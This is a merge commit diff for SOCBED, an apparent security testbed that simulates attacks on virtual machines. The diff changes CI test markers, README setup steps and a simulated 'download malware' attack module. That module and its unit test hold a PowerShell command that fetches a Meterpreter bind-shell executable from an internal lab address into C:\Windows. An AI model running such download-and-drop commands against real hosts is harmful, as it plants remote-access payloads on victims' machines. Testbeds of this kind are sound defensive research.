Merge pull request #14 from fkie-cad/dev

Merge dev into main

.github/ISSUE_TEMPLATE/bug_report.md

@@ -0,0 +1,31 @@
+---
+name: Bug report
+about: Create a report to help us improve
+title: ''
+labels: bug
+assignees: ''
+
+---
+
+**Describe the bug**
+A clear and concise description of what the bug is.
+
+**To Reproduce**
+Steps to reproduce the behavior:
+1. Go to '...'
+2. Click on '....'
+3. Scroll down to '....'
+4. See error
+
+**Expected behavior**
+A clear and concise description of what you expected to happen.
+
+**Screenshots**
+If useful, add screenshots to help explain your problem.
+
+**Host system (please complete the following information):**
+ - OS & version: [e.g. Ubuntu 20.04]
+ - VirtualBox version: [e.g. 6.1.30]
+
+**Additional context**
+Add any other context about the problem here.

.github/ISSUE_TEMPLATE/feature_request.md

@@ -0,0 +1,20 @@
+---
+name: Feature request
+about: Suggest an idea for this project
+title: ''
+labels: enhancement
+assignees: ''
+
+---
+
+**Is your feature request related to a problem? Please describe.**
+A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
+
+**Describe the solution you'd like**
+A clear and concise description of what you want to happen.
+
+**Describe alternatives you've considered**
+A clear and concise description of any alternative solutions or features you've considered.
+
+**Additional context**
+Add any other context or screenshots about the feature request here.

.github/workflows/socbed-systemtest-dev.yml

@@ -105,12 +105,12 @@ jobs:
       - name: Ensure all machines are powered off
         run: ./tools/cleanup_failed_session
 
-      - name: Run system tests ("not longtest")
+      - name: Run stable system tests
         uses: nick-invision/retry@v2
         with:
           timeout_minutes: 30
           max_attempts: 3
-          command: tox -- -m "systest and not longtest"
+          command: tox -- -m "systest and not unstable"
 
   delete-machines:
     runs-on: [self-hosted, linux]

.github/workflows/socbed-systemtest.yml

@@ -100,12 +100,12 @@ jobs:
       - name: Ensure all machines are powered off
         run: ./tools/cleanup_failed_session
 
-      - name: Run system tests ("not longtest")
+      - name: Run stable system tests
         uses: nick-invision/retry@v2
         with:
           timeout_minutes: 30
           max_attempts: 3
-          command: tox -- -m "systest and not longtest"
+          command: tox -- -m "systest and not unstable"
 
   delete-machines:
     runs-on: [self-hosted, linux]

README.md

@@ -12,10 +12,10 @@ The testbed can also be used to generate realistic log/traffic datasets for prod
 
 ## System Requirements
 
-* Physical host with Linux or macOS (running VirtualBox in a virtual machine might be possible as well but was not tested)
+* Physical host with Linux or macOS. Note: Running SOCBED (and therefore VirtualBox) in a virtual machine might work as well but was not tested.
 * RAM: 16 GB minimum, 32 GB recommended
 * CPU: Quad-core with hardware support for virtualization
-* HDD: 50 GB free, SSD is mandatory
+* HDD: 50 GB free, SSD strongly recommended
 
 More resources are required depending on the desired number of simulated clients.
 The numbers above are valid for small simulations with 1-10 clients.
@@ -56,16 +56,9 @@ pip install --editable .
 ```
 
 Next, build all SOCBED virtual machines via ansible and packer while within the virtual environment. Before doing so, you need to:
-- Download a Windows 10 64-bit ISO image from Microsoft and place it in the `provisioning/packer/` directory. We are currently using version 21H2 (November 2021) in English for testing, but other versions should work as well.
-- Change permissions with:
-    ```sh
-    sudo chmod 744 ./provisioning/packer/<filename>.iso
-    ```
-- Calculate the md5 checksum:
-    ```sh
-    md5sum ./provisioning/packer/<filename>.iso
-    ```
-- Update the `iso_url` and `iso_checksum` values in `provisioning/packer/client.json` accordingly.
+- Download a Windows 10 64-bit ISO image from Microsoft. We are currently using version 21H2 (November 2021) in English for testing, but other versions should work as well.
+- Calculate the md5 checksum of this ISO file using `md5sum <filename>.iso`.
+- Open the file `provisioning/packer/client.json` and change the values of the fields `iso_url` and `iso_checksum` accordingly.
 
 The script below will execute everything required to build and configure each respective machine, including snapshotting.
 It will download the remaining ISO files, automatically boot the machines and provision the necessary versions of software dependencies with no human interaction needed.
@@ -97,12 +90,15 @@ Run all unit tests from the repository root directory:
 tox -- -m "not systest"
 ```
 
-If they succeed, run the essential system tests:
+If they succeed, run all stable system tests:
+
+Attention: System tests will start and stop the virtual machines several times and can take a while to complete!
+Do not use SOCBED VMs or apps (`attackconsole`, `vmconsole`) while system tests are running.
+
 ```sh
-tox -- -m "systest and not longtest"
+tox -- -m "systest and not unstable"
 ```
-
-Attention: System tests will start and stop the virtual machines several times and  can take a while to complete!
+(Unstable systests sometimes fail despite correct SOCBED functionality, we're working on it.)
 
 ## Example
 
@@ -157,7 +153,7 @@ By default, the Client logs in automatically as user `setup` in order to change
 To avoid this, you can press and hold the Shift key when Windows starts up.
 
 There is also an SSH server running on the Client (only accessible via the management network).
-Login via SSH is only possible with username `breach` and password `breach`.
+Login via SSH is only possible with username `ssh` and password `breach`.
 
 The following table shows all available web interfaces and their logins:
 

run_sample_simulation

@@ -1,7 +1,7 @@
 #!/usr/bin/env sh
 echo "Starting default VM session at `date`..."
 vmconsole -c start_session
-echo "Waiting for five minutes for the VMs to be ready..."
+echo "Waiting for ten minutes for the VMs to be ready..."
 sleep 600
 echo "Running ten random attack chains..."
 generateattackchains -i 10 -s 12345 > sample_attack_chains

src/attacks/attack_download_malware.py

@@ -47,6 +47,7 @@ def _set_target(self):
 
     def _download_command(self):
         return (
-            "cmd /C powershell -Command \"Invoke-WebRequest '{url}' -OutFile '{file}'\" && "
+            "cmd /C powershell -Command $c = new-object System.Net.WebClient; "
+            "$c.DownloadFile(\\\"{url}\\\", \\\"{file}\\\") && "
             "echo File downloaded successfully.".format(
                 url=self.options.url, file=self.options.file))

src/attacks/tests/test_attack_download_malware.py

@@ -50,9 +50,9 @@ def test_raise_exception_bad_output(self, attack: DownloadMalwareAttack):
 
     def test_download_command(self, attack: DownloadMalwareAttack):
         command = (
-            "cmd /C powershell -Command \"Invoke-WebRequest "
-            "'http://172.18.1.1/meterpreter_bind_tcp.exe' -OutFile "
-            "'C:\\Windows\\meterpreter_bind_tcp.exe'\" && "
+            "cmd /C powershell -Command $c = new-object System.Net.WebClient; "
+            "$c.DownloadFile(\\\"http://172.18.1.1/meterpreter_bind_tcp.exe\\\", "
+            "\\\"C:\\Windows\\meterpreter_bind_tcp.exe\\\") && "
             "echo File downloaded successfully.")
         assert attack._download_command() == command
 

src/systests/test_logging.py

@@ -34,7 +34,7 @@
 from vmcontrol.vmmcontroller import VBoxController
 
 MAX_RUNTIME = 10 * 60  # Ten minutes
-pytestmark = [pytest.mark.systest, pytest.mark.longtest]
+pytestmark = [pytest.mark.systest, pytest.mark.unstable]
 
 @pytest.fixture(scope="module")
 def session():

src/systests/test_ntp_active.py

@@ -28,7 +28,7 @@
 from vmcontrol.sessionhandler import SessionHandler
 from vmcontrol.vmmcontroller import VBoxController
 
-pytestmark = [pytest.mark.systest, pytest.mark.longtest]
+pytestmark = [pytest.mark.systest, pytest.mark.unstable]
 
 
 @pytest.fixture(scope="module")

src/systests/test_ntp_passive.py

@@ -29,7 +29,7 @@
 from vmcontrol.sessionhandler import SessionHandler
 from vmcontrol.vmmcontroller import VBoxController
 
-pytestmark = [pytest.mark.systest, pytest.mark.longtest]
+pytestmark = [pytest.mark.systest, pytest.mark.unstable]
 
 
 @pytest.fixture(scope="module")

tools/cleanup_failed_session

@@ -15,7 +15,7 @@ CLONED_VMS=`vboxmanage list vms | grep 'Clone'| sed -e 's/["a-zA-Z0-9 ]*//'`
 echo "Powering off any VMs that are still running..."
 IFS=$'\n'
 for RUNNINGVM in ${RUNNING_VMS[@]}; do
-	if ! vboxmanage showvminfo "$RUNNINGVM" | grep -q "BREACH"; then
+	if ! vboxmanage showvminfo "$RUNNINGVM" | grep -q "SOCBED"; then
 		continue
 	fi
 	vboxmanage controlvm $RUNNINGVM poweroff

tox.ini

@@ -1,8 +1,8 @@
 # Usage examples:
-#   tox                      # Run all tests
-#   tox -- -m "not systest"  # Run unit tests only
-#   tox -- -m "systest"      # Run system tests only
-#   tox -- -m "not longtest" # Run all except very long tests
+#   tox                                   # Run all tests (not recommended)
+#   tox -- -m "not systest"               # Run all unit tests
+#   tox -- -m "systest and not unstable"  # Run stable system tests
+#   tox -- -m "unstable"                  # Run unstable system tests
 
 [tox]
 envlist = py3
@@ -14,4 +14,4 @@ commands = pytest {posargs}
 [pytest]
 markers =
     systest: mark a system test, i.e., virtual machines will be run.
-    longtest: mark a test that usually runs longer than ten minutes.
+    unstable: mark a system test that does not (yet) reliably work.